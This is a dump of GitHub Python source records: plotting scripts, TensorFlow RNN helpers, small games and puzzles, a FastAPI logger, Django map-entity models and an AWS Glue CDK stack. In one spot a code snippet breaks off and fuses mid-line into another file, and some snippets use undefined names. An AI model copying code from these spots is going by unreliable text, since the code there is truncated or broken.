\"Jun\", \"Jul\", \"Aug\", \"Sep\"])\n plt.xlabel(\"Monthly\")\n plt.ylabel(y_label)\n plt.ylim(y_lim_low, y_lim_high)\n plt.savefig(\"Figures/\" + file_name + \"_BoxMonthly_45.png\")\n # plt.savefig(\"Figures/\" + file_name + \"_LineMonthly_45.png\")\n plt.clf()\n\n plt.rcParams[\"figure.figsize\"] = [16, 9]\n sns.boxplot(data=graph_data_85, x=\"WYT_Month\", y=\"Values\", hue=\"Scen\", palette=plt_color)\n # sns.lineplot(x=\"Day\", y=\"Values\", hue=\"Scen\", data=graph_data_85, palette=plt_color)\n # plt.xticks(np.arange(4), [\"OND\", \"JFM\", \"AMJ\", \"JAS\"])\n plt.xticks(np.arange(12), [\"Oct\", \"Nov\", \"Dec\", \"Jan\", \"Feb\", \"Mar\", \"Apr\", \"May\", \"Jun\", \"Jul\", \"Aug\", \"Sep\"])\n plt.xlabel(\"Monthly\")\n plt.ylabel(y_label)\n plt.ylim(y_lim_low, y_lim_high)\n plt.savefig(\"Figures/\" + file_name + \"_BoxMonthly_85.png\")\n # plt.savefig(\"Figures/\"+ file_name + \"_LineMonthly_85.png\")\n plt.clf()\n\n sns.boxplot(data=graph_data_45, x=\"WYT_Season\", y=\"Values\", hue=\"Scen\", palette=plt_color)\n # sns.lineplot(x=\"Day\", y=\"Values\", hue=\"Scen\", data=graph_data_45, palette=plt_color)\n plt.xticks(np.arange(4), [\"OND\", \"JFM\", \"AMJ\", \"JAS\"])\n plt.xlabel(\"Quarter\")\n plt.ylabel(y_label)\n plt.ylim(y_lim_low, y_lim_high)\n plt.savefig(\"Figures/\" + file_name + \"_BoxQuarter_45.png\")\n # plt.savefig(\"Figures/\" + file_name + \"_LineMonthly_45.png\")\n plt.clf()\n\n plt.rcParams[\"figure.figsize\"] = [16, 9]\n sns.boxplot(data=graph_data_85, x=\"WYT_Season\", y=\"Values\", hue=\"Scen\", palette=plt_color)\n # sns.lineplot(x=\"Day\", y=\"Values\", hue=\"Scen\", data=graph_data_85, palette=plt_color)\n plt.xticks(np.arange(4), [\"OND\", \"JFM\", \"AMJ\", \"JAS\"])\n plt.xlabel(\"Quarter\")\n plt.ylabel(y_label)\n plt.ylim(y_lim_low, y_lim_high)\n plt.savefig(\"Figures/\" + file_name + \"_BoxQuarter_85.png\")\n # plt.savefig(\"Figures/\"+ file_name + \"_LineMonthly_85.png\")\n plt.clf()\n\nclimate_change_csv = generate_csv_climate()\nhistoric_csv = generate_csv_historic()\ngraph_files(climate_change_csv, historic_csv)","repo_name":"GateauXD/sierra-pywr","sub_path":"examples/Merced_Climate/generate_results.py","file_name":"generate_results.py","file_ext":"py","file_size_in_byte":14931,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"82"} +{"seq_id":"13157849275","text":"import numpy as np\nimport tensorflow as tf\n\nfrom util.default_util import *\n\n__all__ = [\"create_embedding\", \"create_activation_function\", \"create_rnn_cell\", \"create_rnn_single_cell\"]\n\ndef create_embedding(vocab_size,\n embedding_dim,\n pretrained=False):\n \"\"\"create embedding with pre-trained embedding or initializer\"\"\"\n if pretrained is True:\n embedding = tf.get_variable(\"embedding\", shape=[vocab_size, embedding_dim], dtype=tf.float32,\n initializer=tf.zeros_initializer, trainable=False)\n embedding_placeholder = tf.placeholder(name=\"embedding_placeholder\",\n shape=[vocab_size, embedding_dim], dtype=tf.float32)\n embedding = embedding.assign(embedding_placeholder)\n else:\n embedding = tf.get_variable(\"embedding\", shape=[vocab_size, embedding_dim], dtype=tf.float32)\n embedding_placeholder = None\n \n return embedding, embedding_placeholder\n\ndef create_activation_function(activation):\n \"\"\"create activation function\"\"\"\n if activation == \"tanh\":\n activation_function = tf.nn.tanh\n elif activation == \"relu\":\n activation_function = tf.nn.relu\n elif activation == \"leaky_relu\":\n activation_function = tf.nn.leaky_relu\n elif activation == \"sigmoid\":\n activation_function = tf.nn.sigmoid\n else:\n activation_function = None\n \n return activation_function\n\ndef create_rnn_single_cell(unit_dim,\n unit_type,\n activation,\n forget_bias,\n residual_connect,\n drop_out,\n device_spec):\n \"\"\"create single rnn cell\"\"\"\n activation_function = create_activation_function(activation)\n \n if unit_type == \"lstm\":\n single_cell = tf.contrib.rnn.LSTMCell(num_units=unit_dim,\n use_peepholes=False, activation=activation_function, forget_bias=forget_bias)\n elif unit_type == \"peephole_lstm\":\n single_cell = tf.contrib.rnn.LSTMCell(num_units=unit_dim,\n use_peepholes=True, activation=activation_function, forget_bias=forget_bias)\n elif unit_type == \"layer_norm_lstm\":\n single_cell = tf.contrib.rnn.LayerNormBasicLSTMCell(num_units=unit_dim,\n layer_norm=True, activation=activation_function, forget_bias=forget_bias)\n elif unit_type == \"gru\":\n single_cell = tf.contrib.rnn.GRUCell(num_units=unit_dim, activation=activation_function)\n else:\n raise ValueError(\"unsupported unit type {0}\".format(unit_type))\n \n if drop_out > 0.0:\n single_cell = tf.contrib.rnn.DropoutWrapper(cell=single_cell, input_keep_prob=1.0-drop_out)\n \n if residual_connect == True:\n single_cell = tf.contrib.rnn.ResidualWrapper(cell=single_cell)\n \n if device_spec is not None:\n single_cell = tf.contrib.rnn.DeviceWrapper(cell=single_cell, device=device_spec)\n \n return single_cell\n\ndef create_rnn_cell(num_layer,\n unit_dim,\n unit_type,\n activation,\n forget_bias,\n residual_connect,\n drop_out,\n num_gpus,\n default_gpu_id):\n \"\"\"create rnn cell\"\"\"\n if num_layer > 1:\n cell_list = []\n for i in range(num_layer):\n single_cell = create_rnn_single_cell(unit_dim=unit_dim, unit_type=unit_type, activation=activation,\n forget_bias=forget_bias, residual_connect=residual_connect, drop_out=drop_out,\n device_spec=get_device_spec(default_gpu_id+i, num_gpus))\n cell_list.append(single_cell)\n cell = tf.contrib.rnn.MultiRNNCell(cell_list)\n else:\n cell = create_rnn_single_cell(unit_dim=unit_dim, unit_type=unit_type, activation=activation,\n forget_bias=forget_bias, residual_connect=residual_connect, drop_out=drop_out,\n device_spec=get_device_spec(default_gpu_id, num_gpus))\n \n return cell\n","repo_name":"stevezheng23/seq2seq_tf","sub_path":"seq2seq/util/seq2seq_util.py","file_name":"seq2seq_util.py","file_ext":"py","file_size_in_byte":4090,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"82"} +{"seq_id":"39743113982","text":"'''\nGiven a non-negative index k where k ≤ 33, return the kth index row of the Pascal's triangle.\n\nNote that the row index starts from 0.\n\n\nIn Pascal's triangle, each number is the sum of the two numbers directly above it.\n\nExample:\n\nInput: 3\nOutput: [1,3,3,1]\nFollow up:\n\nCould you optimize your algorithm to use only O(k) extra space?\n'''\n\nclass Solution:\n def getRow(self, rowIndex: int) -> List[int]:\n fact = [1]\n for i in range(1,rowIndex+1):\n fact.append(i*fact[-1])\n \n ans = []\n for i in range(rowIndex+1):\n val = fact[rowIndex]//(fact[rowIndex-i]*fact[i])\n ans.append(val)\n \n return ans\n \n","repo_name":"shubhamkumar27/Leetcode_solutions","sub_path":"119. Pascal's Triangle II.py","file_name":"119. Pascal's Triangle II.py","file_ext":"py","file_size_in_byte":699,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"82"} +{"seq_id":"31037004213","text":"def solution(bl, w, tw):\n tw.sort()\n answer = 0\n while len(tw)>0:\n a=tw.pop(0)\n print(a)\n if len(tw)==0:\n break\n if (a+tw[0]) logging.Logger:\n return logging.getLogger(settings.API_NAME)\n\n\ndef get_health_check_logger() -> logging.Logger:\n return logging.getLogger(settings.API_NAME + \"_health_check\")\n\n\n@cache\ndef setup_logger() -> None:\n default_logger = get_logger()\n health_check_logger = get_health_check_logger()\n\n if not settings.LOG_DIR.exists():\n default_logger.warning(\"make directory for logging at %s\", settings.LOG_DIR)\n settings.LOG_DIR.mkdir(parents=True, exist_ok=True)\n\n if settings.DEVELOP:\n default_logger.setLevel(logging.DEBUG)\n health_check_logger.setLevel(logging.DEBUG)\n else:\n default_logger.setLevel(logging.INFO)\n health_check_logger.setLevel(logging.INFO)\n\n formatter = logging.Formatter(\"API:%(levelname)-7s[%(asctime)s] %(message)s\")\n formatter.converter = lambda _: datetime.now(tz=JST).timetuple()\n\n # file\n file_handler = TimedRotatingFileHandler(\n settings.LOG_DIR / \"request.log\",\n when=\"D\",\n interval=1,\n backupCount=31,\n )\n file_handler.setFormatter(formatter)\n default_logger.addHandler(file_handler)\n\n # stdout\n stdout_handler = logging.StreamHandler(sys.stdout)\n stdout_handler.setFormatter(formatter)\n default_logger.addHandler(stdout_handler)\n health_check_logger.addHandler(stdout_handler)\n\n # output for /health_check\n health_check_file_handler = logging.FileHandler(settings.LOG_DIR / \"health_check.log\")\n health_check_file_handler.setFormatter(formatter)\n health_check_logger.addHandler(health_check_file_handler)\n\n\ndef repr_client(client: list[str | int] | None) -> str:\n if not client:\n return \"\"\n address, port, *_ = client\n return f\"{address}:{port}\"\n\n\nasync def write_request_log(request: Request, call_next: CallNextType) -> Response:\n logger = get_logger() if request.scope[\"path\"] != \"/health_check\" else get_health_check_logger()\n\n logger.info(\n \"Request : %s - %s - %s\",\n repr_client(request.scope.get(\"client\")),\n request.scope[\"method\"],\n request.scope[\"path\"],\n )\n\n start_time = time.time()\n response = await call_next(request)\n end_time = time.time()\n\n logger.info(\n \"Response: %s - %.4fs\",\n response.status_code,\n end_time - start_time,\n )\n\n return response\n","repo_name":"MasakiKobayashi0884/api_example_poe","sub_path":"api_example_poe/core/logger.py","file_name":"logger.py","file_ext":"py","file_size_in_byte":2753,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"62"} +{"seq_id":"11757650072","text":"from flask import Flask, render_template, request\nfrom flask_debugtoolbar import DebugToolbarExtension\n\nfrom stories import silly_story\n\napp = Flask(__name__)\napp.config['SECRET_KEY'] = \"secret\"\n\ndebug = DebugToolbarExtension(app)\n\n#populate the list of (verb/adjective/nouns)\n#loop over the list and fill in html element with each one\n# grab the data from user reponses, post route?\n# \nprompts = silly_story.prompts\n\n@app.get(\"/questions\")\ndef get_questions():\n \"\"\"Dynamically populates the questions.html with the prompts from a story instance \"\"\"\n return render_template(\"questions.html\", prompts=prompts)\n\n\n@app.get(\"/story\")\ndef make_story():\n \"\"\"Retrieves user inputed prompt answers from questions.html form and generates a story with the answers\"\"\"\n answers = request.args\n story = silly_story.generate(answers)\n return render_template(\"story.html\", story = story)\n #Question: why would you use render_template_string","repo_name":"ahlerliz/flask-madlibs","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":946,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"62"} +{"seq_id":"8360362995","text":"HEIGHT = 6\nWIDTH = 7\n\n\ndef four_cont_subarray(arr):\n count = 0\n for i in range(0, len(arr) - 1):\n if arr[i] == arr[i + 1] and arr[i] != \" \":\n count += 1\n if count + 1 >= 4:\n return arr[i]\n else:\n count = 0\n return False\n\n\ndef check_for_win(grid):\n cols = [[row[i] for row in grid] for i in range(WIDTH)]\n for row in grid:\n if four_cont_subarray(row) is not False:\n return four_cont_subarray(row)\n\n for col in cols:\n if four_cont_subarray(col) is not False:\n return four_cont_subarray(col)\n\n for row in range(HEIGHT - 3):\n for col in range(3, WIDTH):\n if (\n grid[row][col]\n == grid[row + 1][col - 1]\n == grid[row + 2][col - 2]\n == grid[row + 3][col - 3]\n and grid[row][col] != \" \"\n ):\n return grid[row][col]\n\n for row in range(HEIGHT - 3):\n for col in range(WIDTH - 3):\n if (\n grid[row][col]\n == grid[row + 1][col + 1]\n == grid[row + 2][col + 2]\n == grid[row + 3][col + 3]\n ):\n return grid[row][col]\n\n return False\n\n\ndef handle_turn(player):\n global current_turn\n print_grid(grid)\n col = int(input(f\"{current_turn}'s turn. Which column? From 1-{WIDTH} \")) - 1\n\n for i in range(HEIGHT - 1, -1, -1):\n if (grid[i][col]) == \" \":\n grid[i][col] = player\n break\n\n result = check_for_win(grid)\n if result == \"Y\":\n return \"Yellow wins\"\n elif result == \"R\":\n return \"Red wins\"\n elif result == \"DRAW\":\n return \"DRAW\"\n else:\n if current_turn == \"Y\":\n current_turn = \"R\"\n else:\n current_turn = \"Y\"\n\n\ndef print_grid(grid):\n print()\n for i in range(len(grid)):\n for j in range(len(grid[i])):\n print(\"|\", end=\" \")\n print(grid[i][j], end=\" \")\n print(\"|\")\n print(\"-\" * 29)\n print(\" \", end=\"\")\n print(\" \".join([str(x) for x in range(1, WIDTH + 1)]))\n\n\ngrid = [[\" \" for _ in range(WIDTH)] for x in range(HEIGHT)]\ncurrent_turn = \"Y\"\nwhile True:\n result = handle_turn(current_turn)\n if result:\n print(result)\n print_grid(grid)\n break\n","repo_name":"joshuaspiral/connectfourpy","sub_path":"2player/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2352,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"62"} +{"seq_id":"29754920152","text":"import os\nimport glob as g\nimport shutil as sh\nfrom distutils.dir_util import copy_tree\n\nlod= g.glob('*')\nnow= os.getcwd()\n'''\nfor i in range(len(lod)):\n try:\n os.chdir(now+'/'+ lod[i] +'/Eyes/')\n lof= g.glob('*.jpg')\n for j in range(len(lof)):\n os.rename(lof[j], lof[j].split('.')[0]+'_'+lod[i]+'.jpg')\n os.chdir(now+'/'+ lod[i] +'/Nose/')\n lof= g.glob('*.jpg')\n for j in range(len(lof)):\n os.rename(lof[j], lof[j].split('.')[0]+'_'+lod[i]+'.jpg')\n os.chdir(now+'/'+ lod[i] +'/Lips/')\n lof= g.glob('*.jpg')\n for j in range(len(lof)):\n os.rename(lof[j], lof[j].split('.')[0]+'_'+lod[i]+'.jpg')\n os.chdir(now)\n except:\n print(\"haww\")\n''' \n\nos.mkdir('AllEyes')\nos.mkdir('AllNose')\nos.mkdir('AllLips')\n\nfor i in range(len(lod)):\n try:\n copy_tree(lod[i] +'/Eyes','AllEyes')\n copy_tree(lod[i] +'/Lips','AllLips')\n copy_tree(lod[i] +'/Nose','AllNose')\n except:\n print(\"haww\")\n \n \n","repo_name":"akshayjaryal603/Disguise_Face_Detection","sub_path":"copyAllParts.py","file_name":"copyAllParts.py","file_ext":"py","file_size_in_byte":1050,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"62"} +{"seq_id":"44871208274","text":"from pathlib import Path\n\nimport cupy\n\n\ndef transform_dimacs_clause_to_cugen_clause(dimacs_clause: str, number_of_literals: int) -> cupy.array:\n \"\"\"\n Transform a clause line from the DIMACS format to a clause in the cugen SAT format\n\n :param dimacs_clause: Line representing a clause in a DIMACS file\n :param number_of_literals: The number of literals in the formula\n :return: The clause in the cugen SAT format\n \"\"\"\n cugen_clause = cupy.array([cupy.nan] * number_of_literals)\n signed_literals = dimacs_clause.split()[:-1]\n\n for literal in signed_literals:\n literal_as_integer = int(literal)\n literal_as_index = int(cupy.absolute(literal_as_integer) - 1)\n\n if cupy.isnan(cugen_clause[literal_as_index]):\n cugen_clause[literal_as_index] = 0 if literal_as_integer < 0 else 1\n elif literal_as_integer != cugen_clause[literal_as_index]:\n cugen_clause[literal_as_index] = -2\n\n cugen_clause[cugen_clause == -2] = cupy.nan\n\n return cugen_clause\n\n\ndef read_dimacs_file(dimacs_file_path: Path) -> cupy.ndarray:\n \"\"\"\n Given a path to DIMACS CNF file, this function returns a formula in the cugen SAT format\n\n :param dimacs_file_path: The path to the DIMACS\n :return: The CNF formula in the cugen SAT format\n \"\"\"\n with dimacs_file_path.open() as dimacs_file:\n line = dimacs_file.readline()\n while line[0] == 'c':\n line = dimacs_file.readline()\n\n number_of_literals = int(line.split()[2])\n\n clauses = []\n for line in dimacs_file.readlines():\n if line[0] == 'c':\n continue\n if line[0] == '%':\n return cupy.array(clauses)\n clauses.append(transform_dimacs_clause_to_cugen_clause(line, number_of_literals))\n\n return cupy.array(clauses)\n","repo_name":"SamyAB/cugen","sub_path":"cugen/sat_problem_modelling/dimacs_reader.py","file_name":"dimacs_reader.py","file_ext":"py","file_size_in_byte":1833,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"62"} +{"seq_id":"19734979403","text":"import os\nimport math\n\nfrom django.db import models\nfrom django.db.utils import OperationalError\nfrom django.conf import settings\nfrom django.contrib.contenttypes.models import ContentType\nfrom django.core.exceptions import FieldError, ObjectDoesNotExist\nfrom django.core.urlresolvers import NoReverseMatch\nfrom django.contrib import auth\nfrom django.contrib.admin.models import LogEntry as BaseLogEntry\nfrom django.contrib.admin.models import ADDITION, CHANGE, DELETION\nfrom django.utils.formats import localize\nfrom django.utils.timezone import utc\nfrom django.utils.translation import ugettext_lazy as _\nfrom paperclip.models import Attachment\nfrom rest_framework import permissions as rest_permissions\n\nfrom mapentity.templatetags.mapentity_tags import humanize_timesince\nfrom .settings import app_settings, API_SRID\nfrom .helpers import smart_urljoin, is_file_newer, capture_map_image, extract_attributes_html\n\n\n# Used to create the matching url name\nENTITY_LAYER = \"layer\"\nENTITY_LIST = \"list\"\nENTITY_JSON_LIST = \"json_list\"\nENTITY_FORMAT_LIST = \"format_list\"\nENTITY_DETAIL = \"detail\"\nENTITY_MAPIMAGE = \"mapimage\"\nENTITY_DOCUMENT = \"document\"\nENTITY_CREATE = \"add\"\nENTITY_UPDATE = \"update\"\nENTITY_DELETE = \"delete\"\n\nENTITY_KINDS = (\n ENTITY_LAYER, ENTITY_LIST, ENTITY_JSON_LIST,\n ENTITY_FORMAT_LIST, ENTITY_DETAIL, ENTITY_MAPIMAGE, ENTITY_DOCUMENT, ENTITY_CREATE,\n ENTITY_UPDATE, ENTITY_DELETE\n)\n\nENTITY_PERMISSION_CREATE = 'add'\nENTITY_PERMISSION_READ = 'read'\nENTITY_PERMISSION_UPDATE = 'change'\nENTITY_PERMISSION_DELETE = 'delete'\nENTITY_PERMISSION_EXPORT = 'export'\n\nENTITY_PERMISSIONS = (\n ENTITY_PERMISSION_CREATE,\n ENTITY_PERMISSION_READ,\n ENTITY_PERMISSION_UPDATE,\n ENTITY_PERMISSION_DELETE,\n ENTITY_PERMISSION_EXPORT\n)\n\n\nclass MapEntityRestPermissions(rest_permissions.DjangoModelPermissions):\n perms_map = {\n 'GET': ['%(app_label)s.read_%(model_name)s'],\n 'OPTIONS': ['%(app_label)s.read_%(model_name)s'],\n 'HEAD': ['%(app_label)s.read_%(model_name)s'],\n 'POST': ['%(app_label)s.add_%(model_name)s'],\n 'PUT': ['%(app_label)s.change_%(model_name)s'],\n 'PATCH': ['%(app_label)s.change_%(model_name)s'],\n 'DELETE': ['%(app_label)s.delete_%(model_name)s'],\n }\n\n\nclass MapEntityMixin(object):\n\n _entity = None\n capture_map_image_waitfor = '.leaflet-tile-loaded'\n\n @classmethod\n def get_create_label(cls):\n name = cls._meta.verbose_name\n if hasattr(name, '_proxy____args'):\n name = name._proxy____args[0] # untranslated\n # Whole \"add\" phrase translatable, but not catched by makemessages\n return _(u\"Add a new %s\" % name.lower())\n\n @classmethod\n def get_entity_kind_permission(cls, entity_kind):\n operations = {\n ENTITY_CREATE: ENTITY_PERMISSION_CREATE,\n ENTITY_UPDATE: ENTITY_PERMISSION_UPDATE,\n ENTITY_DELETE: ENTITY_PERMISSION_DELETE,\n\n ENTITY_DETAIL: ENTITY_PERMISSION_READ,\n ENTITY_LAYER: ENTITY_PERMISSION_READ,\n ENTITY_LIST: ENTITY_PERMISSION_READ,\n ENTITY_JSON_LIST: ENTITY_PERMISSION_READ,\n\n ENTITY_FORMAT_LIST: ENTITY_PERMISSION_EXPORT,\n ENTITY_MAPIMAGE: ENTITY_PERMISSION_EXPORT,\n ENTITY_DOCUMENT: ENTITY_PERMISSION_EXPORT,\n }\n perm = operations.get(entity_kind, entity_kind)\n assert perm in ENTITY_PERMISSIONS\n return perm\n\n @classmethod\n def get_permission_codename(cls, entity_kind):\n perm = cls.get_entity_kind_permission(entity_kind)\n opts = cls._meta\n appname = opts.app_label.lower()\n if opts.proxy:\n proxied = opts.proxy_for_model._meta\n appname = proxied.app_label.lower()\n return '%s.%s' % (appname, auth.get_permission_codename(perm, opts))\n\n @classmethod\n def latest_updated(cls):\n try:\n fname = app_settings['DATE_UPDATE_FIELD_NAME']\n return cls.objects.latest(fname).get_date_update()\n except (cls.DoesNotExist, FieldError):\n return None\n\n def get_date_update(self):\n try:\n fname = app_settings['DATE_UPDATE_FIELD_NAME']\n return getattr(self, fname).replace(tzinfo=utc)\n except AttributeError:\n return None\n\n def get_geom(self):\n \"\"\" Get main geometry field.\n \"\"\"\n return getattr(self, app_settings['GEOM_FIELD_NAME'], None)\n\n def delete(self, *args, **kwargs):\n # Delete map image capture when delete object\n image_path = self.get_map_image_path()\n if os.path.exists(image_path):\n os.unlink(image_path)\n super(MapEntityMixin, self).delete(*args, **kwargs)\n\n @classmethod\n @models.permalink\n def get_layer_url(cls):\n return (cls._entity.url_name(ENTITY_LAYER), )\n\n @classmethod\n @models.permalink\n def get_list_url(cls):\n return (cls._entity.url_name(ENTITY_LIST), )\n\n @classmethod\n @models.permalink\n def get_jsonlist_url(cls):\n return (cls._entity.url_name(ENTITY_JSON_LIST), )\n\n @classmethod\n @models.permalink\n def get_format_list_url(cls):\n return (cls._entity.url_name(ENTITY_FORMAT_LIST), )\n\n @classmethod\n @models.permalink\n def get_add_url(cls):\n return (cls._entity.url_name(ENTITY_CREATE), )\n\n def get_absolute_url(self):\n return self.get_detail_url()\n\n @classmethod\n @models.permalink\n def get_generic_detail_url(cls):\n return (cls._entity.url_name(ENTITY_DETAIL), [str(0)])\n\n @models.permalink\n def get_detail_url(self):\n return (self._entity.url_name(ENTITY_DETAIL), [str(self.pk)])\n\n @property\n def map_image_url(self):\n return self.get_map_image_url()\n\n @models.permalink\n def get_map_image_url(self):\n return (self._entity.url_name(ENTITY_MAPIMAGE), [str(self.pk)])\n\n @models.permalink\n def get_document_url(self):\n return (self._entity.url_name(ENTITY_DOCUMENT), [str(self.pk)])\n\n @models.permalink\n def get_update_url(self):\n return (self._entity.url_name(ENTITY_UPDATE), [str(self.pk)])\n\n @models.permalink\n def get_delete_url(self):\n return (self._entity.url_name(ENTITY_DELETE), [str(self.pk)])\n\n @property\n def attachments(self):\n return Attachment.objects.attachments_for_object(self)\n\n def get_map_image_extent(self, srid=API_SRID):\n fieldname = app_settings['GEOM_FIELD_NAME']\n obj = getattr(self, fieldname)\n obj.transform(srid)\n return obj.extent\n\n def prepare_map_image(self, rooturl):\n if self.get_geom() is None:\n return True\n path = self.get_map_image_path()\n # Do nothing if image is up-to-date\n if is_file_newer(path, self.get_date_update()):\n return False\n url = smart_urljoin(rooturl, self.get_detail_url())\n extent = self.get_map_image_extent(3857)\n length = max(extent[2] - extent[0], extent[3] - extent[1])\n if length:\n hint_size = app_settings['MAP_CAPTURE_SIZE']\n length_per_tile = 256 * length / hint_size\n RADIUS = 6378137\n CIRCUM = 2 * math.pi * RADIUS\n zoom = round(math.log(CIRCUM / length_per_tile, 2))\n size = math.ceil(length * 1.1 * 256 * 2 ** zoom / CIRCUM)\n else:\n size = app_settings['MAP_CAPTURE_SIZE']\n capture_map_image(url, path, size=size, waitfor=self.capture_map_image_waitfor)\n return True\n\n def get_map_image_path(self):\n basefolder = os.path.join(settings.MEDIA_ROOT, 'maps')\n if not os.path.exists(basefolder):\n os.makedirs(basefolder)\n return os.path.join(basefolder, '%s-%s.png' % (self._meta.module_name, self.pk))\n\n def get_attributes_html(self, request):\n return extract_attributes_html(self.get_detail_url(), request)\n\n @classmethod\n def get_content_type_id(cls):\n try:\n return ContentType.objects.get_for_model(cls).pk\n except OperationalError: # table is not yet created\n return None\n\n @property\n def creator(self):\n log_entry = LogEntry.objects.filter(\n content_type_id=self.get_content_type_id(),\n object_id=self.pk,\n action_flag=ADDITION).order_by('pk').last()\n return log_entry and log_entry.user\n\n @property\n def authors(self):\n return auth.get_user_model().objects.filter(\n logentry__content_type_id=self.get_content_type_id(),\n logentry__object_id=self.pk).distinct()\n\n @property\n def last_author(self):\n return self.authors.order_by('logentry__pk').last()\n\n def is_public(self):\n \"Override this method to allow unauthenticated access to attachments\"\n return False\n\n\nclass LogEntry(MapEntityMixin, BaseLogEntry):\n geom = None\n object_verbose_name = _(\"object\")\n\n class Meta:\n proxy = True\n\n @property\n def action_flag_display(self):\n return {\n ADDITION: _(\"Added\"),\n CHANGE: _(\"Changed\"),\n DELETION: _(\"Deleted\"),\n }[self.action_flag]\n\n @property\n def action_time_display(self):\n return u'{0} ({1})'.format(localize(self.action_time),\n humanize_timesince(self.action_time))\n\n @property\n def object_display(self):\n model_str = unicode(self.content_type)\n try:\n obj = self.get_edited_object()\n assert obj._entity, 'Unregistered model %s' % model_str\n obj_url = obj.get_detail_url()\n except (ObjectDoesNotExist, NoReverseMatch, AssertionError):\n return u'%s %s' % (model_str, self.object_repr)\n else:\n return u'%s %s' % (\n obj.pk, obj_url, model_str, self.object_repr)\n","repo_name":"TheoLechemia/mapentity-project","sub_path":"mapentity/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":9859,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"62"} +{"seq_id":"73582703237","text":"import matplotlib as mpl\nimport matplotlib.pyplot as plt\nimport math\nimport csv\nimport random\n\ntime = 0.1\n\ndpi = 50\nfig = plt.figure(dpi = dpi, figsize = (640 / dpi, 360 / dpi))\n\nplt.axis([0, time , -1, 1])\n\nplt.title('Шум')\nplt.xlabel('t, с')\nplt.ylabel('U, В')\n\nxs = []\nnoise_list = []\n\nx = 0.0\n\ncsvdata = [[]]\nwhile x <= time :\n noise = random.uniform(-1, 1)\n noise_list.append(noise)\n csvdata.append([x, noise])\n xs += [x]\n x += math.pow(100000, -1)\n\ndiscretePoints = open('report/noise.csv', 'w')\nwith discretePoints:\n writer = csv.writer(discretePoints)\n writer.writerows(csvdata)\n\nplt.plot(xs, noise_list, '.', label = 'Шум')\nfig.savefig('report/noise_full.png')\nplt.axis([0.05, 0.055, -1, 1])\nplt.legend(loc = 'upper right')\nfig.savefig('report/noise_5.png')\n\nav = sum(noise_list)/len(noise_list)\nprint('Среднее значение: %s' % av)\ndisp = 0\nfor i in noise_list:\n disp = disp + pow((i - av), 2)\ndisp = disp / (len(noise_list) - 1)\nprint('Дисперсия: %s' % disp)\n","repo_name":"denisko890/digit_data_processing","sub_path":"lab2/noise.py","file_name":"noise.py","file_ext":"py","file_size_in_byte":1022,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"62"} +{"seq_id":"3492431323","text":"import matplotlib.pyplot as plt\nimport seaborn as sns\n\n\ndef plot_price_variation_per_sector(df):\n # Extract the columns we need in this step from the dataframe\n df_ = df.loc[:, ['Stock', 'Sector', 'PRICE VAR [%]']]\n\n # Get list of sectors\n sector_list = df_['Sector'].unique()\n\n # Plot the percent price variation for each sector\n for sector in sector_list:\n temp = df_[df_['Sector'] == sector]\n\n plt.figure(figsize=(30, 5))\n plt.plot(temp['Stock'], temp['PRICE VAR [%]'])\n plt.title(sector.upper(), fontsize=20)\n plt.show()\n\n\ndef plot_correlation_matrix(df, title):\n corrMatrix = df.corr()\n fig, ax = plt.subplots(figsize=(20, 15))\n sns.heatmap(corrMatrix, annot=False, cmap='YlGnBu', vmin=-1, vmax=1, center=0, ax=ax)\n# plt.title(title, fontsize=20)\n fig.savefig(f\"{title}.png\", bbox_inches=\"tight\")\n plt.show()\n","repo_name":"Simbonobo/economics","sub_path":"eda.py","file_name":"eda.py","file_ext":"py","file_size_in_byte":885,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"62"} +{"seq_id":"73665817798","text":"from aws_cdk import core\nfrom aws_cdk import aws_glue as glue\n\nclass RdsClusterStack(core.Stack):\n\n def __init__(self, scope: core.Construct, id: str, **kwargs) -> None:\n \n glue.CfnJob(\n scope=self,\n id=modname,\n command={\n 'name': 'glueetl',\n 'python_version': '3',\n 'script_location': 's3://shaw-stc-edl-etl-config-playpen/test/glue/spark/__main__.py'\n },\n role=etl_role.role_arn,\n default_arguments={\n '--enable-glue-datacatalog': ''\n },\n allocated_capacity=10,\n description='Test Spark Glue ETL',\n glue_version='1.0',\n max_capacity=10,\n max_retries=0,\n number_of_workers=1,\n timeout=2880,\n worker_type='Standard'\n )\n\napp = core.App()\nGlueJobStack(app, \"glue-job\")\n\napp.synth()\n","repo_name":"dkovvuri/cdk-examples","sub_path":"glue_job/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":930,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"62"} +{"seq_id":"38829852949","text":"# Нап��сать функцию, которая возвращает\n# длину самой длинной подстроки, которая состоит только из гласных (aiueoAIUEO).\n\nimport re\ndef max_len(string_):\n list_from_string = string_.split()\n list_2 = []\n for el in list_from_string:\n el_from_vowels = re.sub(r'[^aeiouAEIOU]', '', el)\n list_2.append(el_from_vowels)\n list_3 = []\n for a in list_from_string:\n for b in list_2:\n if a == b:\n list_3.append(b)\n\n print(max(list_3, key=len))\nmax_len('AV aa is eeei largest Uuuuiiioo Analytics community of')","repo_name":"lelya12321/-roadmap","sub_path":"регулярные выражения 1 задача.py","file_name":"регулярные выражения 1 задача.py","file_ext":"py","file_size_in_byte":649,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"62"} +{"seq_id":"8678170355","text":"#!python\nimport re\nimport subprocess\nimport sys\nfrom argparse import ArgumentParser\nimport sys\n#read a fasta file and return a dictionary, the key is entry id and the value is the sequence in upcase\nfrom utils import readFastaFile\nfrom utils import str2bool\nimport re\n\nclass SNP:\n def __init__(self, chr, v4cordinate, maf, geno, depth, 